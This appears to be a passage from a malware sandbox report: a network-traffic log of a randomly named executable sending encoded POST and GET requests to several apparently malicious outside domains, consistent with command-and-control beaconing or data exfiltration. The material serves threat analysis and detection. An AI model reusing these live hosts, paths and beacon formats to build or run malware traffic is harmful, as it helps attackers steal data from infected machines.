                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.55721991.203.110.247802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:38.340058088 CEST450OUTGET /ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.wildenmann.shop
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:38.962238073 CEST1081INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 707
                                                    date: Thu, 05 Sep 2024 12:26:38 GMT
                                                    server: LiteSpeed
                                                    location: http://wildenmann.shop/ccpi/?sH=nVVHdDTx2PSTVJ&V6h=96vdCLF6vzOjbBC3mbkrC4zzUz2rd8Vx/oWpiC2btghNh3zo1JohGtlH0OSuyloWV4aL4gulV88Z8WUGiHxG/5dbitedT3dwls/KnYRS+O7Xw5tFmWV2oMBDB9F7a8JBDA==
                                                    x-powered-by: PleskLin
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.55722034.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:44.030093908 CEST717OUTPOST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 4d 65 31 68 44 51 6e 36 34 69 76 37 75 39 73 73 45 4f 57 33 67 39 4f 78 67 6f 31 45 37 52 2b 76 6e 6e 53 2f 2b 2b 41 67 6e 70 59 30 34 76 6d 2f 74 6c 59 34 6e 33 61 72 4e 57 33 6a 6e 69 78 63 4b 69 68 74 44 61 38 6f 33 52 44 47 35 47 4b 75 6f 44 52 31 51 6a 57 4c 77 50 65 59 48 43 74 4d 68 37 61 69 38 79 66 39 57 37 7a 64 6b 46 48 39 38 52 4b 43 6a 70 65 73 64 54 53 76 75 67 54 76 64 62 74 61 46 66 54 70 42 6f 69 36 59 56 64 34 4b 6b 2b 33 63 53 43 32 62 50 6b 72 30 30 46 31 77 62 67 69 68 4e 77 30 70 7a 39 53 47 57 37 75 4a 76 50 47 69 77 36 5a 73 59 4b 71 33 50 35 69 74 65 44 4e 46 41 3d
                                                    Data Ascii: V6h=2Me1hDQn64iv7u9ssEOW3g9Oxgo1E7R+vnnS/++AgnpY04vm/tlY4n3arNW3jnixcKihtDa8o3RDG5GKuoDR1QjWLwPeYHCtMh7ai8yf9W7zdkFH98RKCjpesdTSvugTvdbtaFfTpBoi6YVd4Kk+3cSC2bPkr00F1wbgihNw0pz9SGW7uJvPGiw6ZsYKq3P5iteDNFA=
                                                    Sep 5, 2024 14:26:44.499119997 CEST393INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:44 GMT
                                                    X-Served-By: cache-iad-kiad7000163-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.55722134.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:46.574439049 CEST737OUTPOST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 4d 65 31 68 44 51 6e 36 34 69 76 36 4e 6c 73 2f 56 4f 57 79 41 39 50 74 77 6f 31 4f 62 52 69 76 6e 72 53 2f 36 6e 64 6a 56 4e 59 30 5a 66 6d 2b 73 6c 59 37 6e 33 61 79 39 57 32 74 48 69 75 63 4b 2b 54 74 47 69 38 6f 78 39 44 47 39 4b 4b 75 35 44 57 30 41 6a 55 45 51 50 63 63 48 43 74 4d 68 37 61 69 39 57 31 39 57 6a 7a 63 58 74 48 2b 5a 78 46 63 54 70 64 72 64 54 53 72 75 67 74 76 64 62 62 61 48 72 35 70 45 73 69 36 61 39 64 70 37 6b 39 34 63 53 41 35 37 4f 7a 75 47 56 51 79 53 6e 64 74 33 39 74 70 4a 76 50 61 51 37 52 30 72 6e 6e 56 43 63 43 4a 2f 51 39 37 48 75 51 34 4f 4f 7a 54 53 56 52 44 56 36 48 48 59 61 62 71 49 71 2f 42 31 64 4f 61 4a 66 2b
                                                    Data Ascii: V6h=2Me1hDQn64iv6Nls/VOWyA9Ptwo1ObRivnrS/6ndjVNY0Zfm+slY7n3ay9W2tHiucK+TtGi8ox9DG9KKu5DW0AjUEQPccHCtMh7ai9W19WjzcXtH+ZxFcTpdrdTSrugtvdbbaHr5pEsi6a9dp7k94cSA57OzuGVQySndt39tpJvPaQ7R0rnnVCcCJ/Q97HuQ4OOzTSVRDV6HHYabqIq/B1dOaJf+
                                                    Sep 5, 2024 14:26:47.030900955 CEST393INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:46 GMT
                                                    X-Served-By: cache-iad-kiad7000094-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.55722234.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:49.224646091 CEST1754OUTPOST /lztc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.formytinyhome.com
                                                    Referer: http://www.formytinyhome.com/lztc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 32 4d 65 31 68 44 51 6e 36 34 69 76 36 4e 6c 73 2f 56 4f 57 79 41 39 50 74 77 6f 31 4f 62 52 69 76 6e 72 53 2f 36 6e 64 6a 56 46 59 30 72 6e 6d 34 50 4e 59 36 6e 33 61 74 4e 57 37 74 48 6a 30 63 4b 32 58 74 47 65 57 6f 30 68 44 48 65 43 4b 37 39 66 57 2b 41 6a 55 63 67 50 5a 59 48 44 6c 4d 6c 58 57 69 39 47 31 39 57 6a 7a 63 52 52 48 71 63 52 46 65 54 70 65 73 64 54 65 76 75 67 57 76 64 54 4c 61 48 2f 44 70 33 55 69 36 36 74 64 72 70 38 39 31 63 53 47 36 37 4f 37 75 47 59 41 79 57 47 73 74 7a 30 6c 70 4c 76 50 4b 78 36 31 6a 66 6a 4b 4f 44 55 67 47 49 56 66 74 58 2b 32 77 74 4f 57 57 42 68 6a 49 31 57 76 45 75 65 63 6f 37 50 73 43 6b 4e 45 57 35 36 74 62 73 54 63 6a 61 2b 66 63 75 46 55 33 35 31 63 59 6e 55 48 6d 75 6c 62 5a 44 79 48 32 36 68 78 43 55 6a 62 42 72 30 61 37 33 4f 70 35 52 56 70 68 38 52 6a 2f 2f 32 6e 6f 44 32 34 57 4c 39 51 4c 2f 66 6b 2f 42 37 6b 43 4d 55 4a 37 73 51 6f 4c 69 2b 37 6d 78 73 7a 62 42 6e 48 4f 58 52 71 77 76 77 42 42 7a 38 58 74 52 77 33 4a 7a 33 6b 63 64 [TRUNCATED]
                                                    Data Ascii: V6h=2Me1hDQn64iv6Nls/VOWyA9Ptwo1ObRivnrS/6ndjVFY0rnm4PNY6n3atNW7tHj0cK2XtGeWo0hDHeCK79fW+AjUcgPZYHDlMlXWi9G19WjzcRRHqcRFeTpesdTevugWvdTLaH/Dp3Ui66tdrp891cSG67O7uGYAyWGstz0lpLvPKx61jfjKODUgGIVftX+2wtOWWBhjI1WvEueco7PsCkNEW56tbsTcja+fcuFU351cYnUHmulbZDyH26hxCUjbBr0a73Op5RVph8Rj//2noD24WL9QL/fk/B7kCMUJ7sQoLi+7mxszbBnHOXRqwvwBBz8XtRw3Jz3kcdsZKOJVicK+oFhsiU+FOyRu1A4URxaZq5tq/eOC4WgxYcirHVlzJ9BU+MG9wPlM5oIdh3KgaSa6orE/3lHg33xCzgN51rPMBdW0VEnMA8mssfY9m7fB4SWTaGJ8GW49tPLVe1jm9ekQw7MXDK7PAg39KUtgqZvxpfruFNrDG1viJ5uIKmXyL54xm8tpzFjq+qhKsmLlrQKPnOpuM+Ug9iCBs0wINLpofyLk7+z7k76NLC0D4Fb7i4QcRmtfuMgIDsiz6NdyeV1R1TEee0wd5la5u2mg3K9JdlEZ4VUvPqm4rFeQ724nhXgmOiWA+D4hEv0tO/9D72ed20OUN1jWkO/oKag/mC6VQD3500EMqi9yifpGYt+6TL/AH6JEAdTHFQ7+7ngsHURlU8sGwxuXMnzZKXeOZIT56Dn9HUcHvoKJF/pYVwU/Q0sTVjcLKEdjToo8Tbp0Ih52CrwxPQ8JcAaRJGv6rtl/6GjMkLocN2/HngnVWGbbRYSGz9ynWAYKr9D8OtDum7BPdV3JmURh+Y0lLKxSU21QbtzQtrq7xqZwjROQfwQupcpM822j0AzYD5yJKuD1HJZ7ydsX57GyIiIcs67BQ5E5xlbKfpgO9CeBQpmPK58hY4egP6P0KMpHPq63ND3P9Q0diIYyJ2oTfG+muw/do29smTyI [TRUNCATED]
                                                    Sep 5, 2024 14:26:49.679217100 CEST393INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:49 GMT
                                                    X-Served-By: cache-iad-kjyo7100126-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.55722334.149.87.45802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:51.824080944 CEST452OUTGET /lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.formytinyhome.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:26:52.280508995 CEST548INHTTP/1.1 301 Moved Permanently
                                                    Content-Length: 0
                                                    Location: https://www.formytinyhome.com/lztc/?V6h=7O2Vi30c2oKUz/gZ0nmLwDIgwhZodI9AolnTqJiIqHlz4L2fxMx7xnfeqZW9vH+mS4f3qWyrmk5EaMabwLfk8B7yJXbJanTlK0OvtO++wyfSRGRbh4BKfAxEuo7imst0wg==&sH=nVVHdDTx2PSTVJ
                                                    Accept-Ranges: bytes
                                                    Date: Thu, 05 Sep 2024 12:26:52 GMT
                                                    X-Served-By: cache-iad-kjyo7100042-IAD
                                                    X-Cache: MISS
                                                    X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=
                                                    Via: 1.1 google
                                                    glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.55722472.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:57.438364983 CEST696OUTPOST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4b 4c 52 50 6e 70 67 52 70 44 6a 76 70 76 65 70 41 57 50 41 41 45 51 33 37 77 2b 72 56 66 53 57 51 62 49 51 74 4b 73 44 64 59 6f 48 77 61 64 37 51 36 6e 44 73 76 6d 4e 39 56 34 4e 42 55 37 34 4a 6a 31 37 4e 7a 6b 42 48 77 74 38 66 6d 62 6e 54 64 34 34 4f 46 6d 68 62 79 44 47 62 44 32 37 55 78 32 57 66 4e 70 77 2f 37 30 45 6d 4a 4c 74 4b 64 70 62 4e 4e 67 65 77 37 47 4c 77 54 67 46 6d 30 51 54 35 48 51 4c 34 35 42 53 4e 54 63 6b 76 54 46 75 64 53 48 42 48 43 48 66 6c 56 4e 68 49 79 4f 67 4c 6c 51 39 78 44 50 4f 4a 6f 48 63 67 71 4f 79 68 66 58 4c 35 51 51 3d
                                                    Data Ascii: V6h=8fFUnYFewsI0KLRPnpgRpDjvpvepAWPAAEQ37w+rVfSWQbIQtKsDdYoHwad7Q6nDsvmN9V4NBU74Jj17NzkBHwt8fmbnTd44OFmhbyDGbD27Ux2WfNpw/70EmJLtKdpbNNgew7GLwTgFm0QT5HQL45BSNTckvTFudSHBHCHflVNhIyOgLlQ9xDPOJoHcgqOyhfXL5QQ=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.55722572.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:26:59.980089903 CEST716OUTPOST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4c 76 74 50 33 2b 4d 52 72 6a 69 64 33 2f 65 70 56 6d 4f 4a 41 45 63 33 37 78 37 75 56 74 32 57 51 2b 73 51 73 4c 73 44 65 59 6f 48 34 36 64 79 64 61 6e 59 73 76 37 36 39 51 51 4e 42 55 66 34 4a 69 46 37 4b 43 6b 43 46 67 74 2b 58 47 62 68 4e 74 34 34 4f 46 6d 68 62 79 58 73 62 41 47 37 58 42 47 57 65 6f 46 76 68 72 30 48 78 35 4c 74 4f 64 70 66 4e 4e 68 4c 77 35 79 6c 77 52 6f 46 6d 31 67 54 35 53 6b 49 78 35 42 51 53 44 64 61 75 68 6b 67 58 6b 50 72 48 42 71 4c 33 6e 39 4d 41 6b 6a 4b 52 48 59 56 69 6a 6a 32 5a 37 50 72 78 61 76 62 37 38 48 37 6e 48 48 32 55 79 2f 46 39 66 63 6d 50 7a 33 6e 55 43 33 72 7a 2f 7a 61
                                                    Data Ascii: V6h=8fFUnYFewsI0LvtP3+MRrjid3/epVmOJAEc37x7uVt2WQ+sQsLsDeYoH46dydanYsv769QQNBUf4JiF7KCkCFgt+XGbhNt44OFmhbyXsbAG7XBGWeoFvhr0Hx5LtOdpfNNhLw5ylwRoFm1gT5SkIx5BQSDdauhkgXkPrHBqL3n9MAkjKRHYVijj2Z7Prxavb78H7nHH2Uy/F9fcmPz3nUC3rz/za


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.55722672.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:02.516108990 CEST1733OUTPOST /kfsd/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.5a8yly.cfd
                                                    Referer: http://www.5a8yly.cfd/kfsd/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Raw: 56 36 68 3d 38 66 46 55 6e 59 46 65 77 73 49 30 4c 76 74 50 33 2b 4d 52 72 6a 69 64 33 2f 65 70 56 6d 4f 4a 41 45 63 33 37 78 37 75 56 74 2b 57 52 49 67 51 75 6f 30 44 66 59 6f 48 6e 4b 64 2f 64 61 6d 4b 73 76 7a 2b 39 51 56 76 42 53 62 34 50 45 35 37 50 77 63 43 50 67 74 2b 56 47 62 6b 54 64 34 58 4f 46 33 6d 62 79 48 73 62 41 47 37 58 44 75 57 59 39 70 76 6a 72 30 45 6d 4a 4c 68 4b 64 70 37 4e 4e 35 62 77 35 32 62 7a 69 51 46 6e 56 77 54 32 41 4d 49 2b 35 42 57 52 44 64 53 75 68 6f 72 58 6c 6e 4e 48 42 76 57 33 6c 64 4d 54 53 53 57 4f 47 4a 50 34 42 7a 41 62 59 7a 51 6e 74 53 38 6b 63 54 6a 6a 30 6d 52 51 78 44 73 31 2f 6f 47 45 68 2b 54 58 58 4c 4f 78 5a 57 76 59 30 37 7a 43 50 43 6c 44 7a 62 35 41 4e 49 33 52 43 30 48 75 34 33 72 65 56 37 6f 39 65 61 4c 78 46 6b 4e 57 76 6f 4e 61 4f 61 34 4d 4c 6a 2b 5a 75 65 2b 4c 6e 6b 35 42 33 6a 59 43 4d 79 6d 58 79 44 36 70 4a 38 6b 2f 33 2f 73 4f 6b 53 61 73 52 6c 31 64 53 7a 6e 48 6a 64 6a 6e 33 55 42 59 48 71 35 53 32 4b 57 32 30 63 6c 36 57 79 77 49 74 [TRUNCATED]
                                                    Data Ascii: V6h=8fFUnYFewsI0LvtP3+MRrjid3/epVmOJAEc37x7uVt+WRIgQuo0DfYoHnKd/damKsvz+9QVvBSb4PE57PwcCPgt+VGbkTd4XOF3mbyHsbAG7XDuWY9pvjr0EmJLhKdp7NN5bw52bziQFnVwT2AMI+5BWRDdSuhorXlnNHBvW3ldMTSSWOGJP4BzAbYzQntS8kcTjj0mRQxDs1/oGEh+TXXLOxZWvY07zCPClDzb5ANI3RC0Hu43reV7o9eaLxFkNWvoNaOa4MLj+Zue+Lnk5B3jYCMymXyD6pJ8k/3/sOkSasRl1dSznHjdjn3UBYHq5S2KW20cl6WywItrXa7mJFaY67FqfTga+FuwYC5Jd0QKyUMpM7jogZlM2ylIqxDV+pvQ0tsjBsMYUMRLFQNSbwHsuFdeW5LU6uGHzCbfIwUgG2x0YQle4dopxMOMNvxuqC5A6tjSSvrxM4Y/bQSzsdbAbv8CJTpStve8RXV+qtnPPk5FQWSRGgBlmTFS5vafn0b8VWEftC7DRcjHknJ01pEmZdk0vrFXXFkJ9hNg/68glmbem7K0dc8WNsGhqgejM7aB9vFv6g+cWoOu1eDXxKpUNPOK71y4Jft09jgyzuexWyHIXD/xBZcCOEFkZG1iUhGSjSvCrZBaFN9YAiJsGDFf0/eB0Mjpzu79hU6jHohBIoabUVO/UF1o8NXgtU9maJNz6HlofnB62wR5YMsZ0sQ07XXn9p++JwjHvLoXzwY0FVQBJKIM1EvsgGGEBoHmRMvpXCtQ+jMjW/SwSWDxI2Z+XHBY7rZlTXofvzs82lK/k0C1IDs1T1VR7D7l7pWriEWZ9/KTA/v24+Dbd6aKIhgc+czAryFGhhNf7IAbgOR37cvT8UkrO0KVGpw0/cW842OqXnP2pduqsbvJ76ldMumsVFQkz/TrzdrVSgQEdBPk4kdapTlTznWDZWBa4OS5egTDrdKxMdnsvArJjA7369cy11pXUYlOJayXt4xWyr8y74RvD [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.55722772.52.178.23802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:05.040975094 CEST445OUTGET /kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.5a8yly.cfd
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Sep 5, 2024 14:27:05.588308096 CEST504INHTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:27:05 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww1.5a8yly.cfd/kfsd/?sH=nVVHdDTx2PSTVJ&V6h=xdt0ktZO0PUVE8ko/vYSpSqVpvi6VCO8XncayCS9euW1eL9fqbwTWogO+vBLUJXWpdaX6FBHI3PARBJ6BBwlCmNGVSn5FdlKflrneiv2THCpchPWcIBHiIkx6LHBCpUWbA==&usid=16&utid=34491550499
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.557228199.59.243.226802672C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 5, 2024 14:27:11.136218071 CEST741OUTPOST /2hp8/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.thecivilwearsprada06.site
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.thecivilwearsprada06.site
                                                    Referer: http://www.thecivilwearsprada06.site/2hp8/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
